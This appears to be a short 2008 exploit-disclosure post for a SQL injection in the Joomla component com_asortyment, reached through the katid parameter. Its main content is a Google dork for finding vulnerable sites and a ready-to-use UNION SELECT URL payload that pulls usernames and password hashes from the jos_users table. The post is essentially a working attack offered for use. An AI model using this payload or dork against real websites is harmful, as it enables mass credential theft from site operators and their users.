joomla SQL Injection(com_asortyment)katid

hackturkiye.hackturkiye@xxxxxxxxx · 21 Feb 2008 15:34:46 -0000



###############################################################
# 
#   joomla SQL Injection(com_asortyment)katid
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MA&#304;L : hackturkiye.hackturkiye@xxxxxxxxx
#        
################################################################
# 
#  DORK 1 : allinurl:"com_asortyment"katid
# 
#  DORK 2 : allinurl: 
#
################################################################
   EXPLOIT : 

index.php?option=com_asortyment&Itemid=36&lang=pl&task=kat&katid=-9999999/**/union/**/select/**/0x3a,concat(username,0x3a,password),concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/*

################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################